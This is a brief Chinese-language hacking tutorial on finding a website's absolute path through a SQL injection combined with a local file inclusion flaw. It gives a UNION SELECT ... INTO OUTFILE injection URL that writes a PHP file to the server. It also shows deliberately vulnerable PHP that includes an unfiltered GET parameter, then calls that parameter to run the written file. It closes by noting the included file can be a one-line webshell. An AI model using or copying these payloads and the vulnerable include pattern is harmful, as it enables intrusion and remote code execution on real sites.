绝对办法获得web途径[网络技术]

感激孤水朋友的一文章,首先假定我们的网站存在SQL注入漏洞与一个本地包含漏洞!
那么PHP.INI里的magic_quotes_gpc = off
我们重注射点判断出为ROOT权限!
www.lengyueduyun.com/index.php?id=2 union select 1,2,3,4,这里写<? phpinfo(); ?> 十六进制转换,5,6 into outfile 'D:\\duyun\\1.php';
这样1.php 内容就是<? phpinfo(); ?>咯!下面是包含漏洞的代码!保存为index.php~大家不用随着我做~我只是假定罢了
<?php
$fuck = $_GET["fuck"];
if ($fuck) {
include $_GET["fuck"];
}
?>
下面浏览器输入www.lengyueduyun.com/index.php?fuck=D:\duyun\1.php
这样就可以查看到WEB绝度途径咯
增补一点,包含的文件可以是一句话木马等等..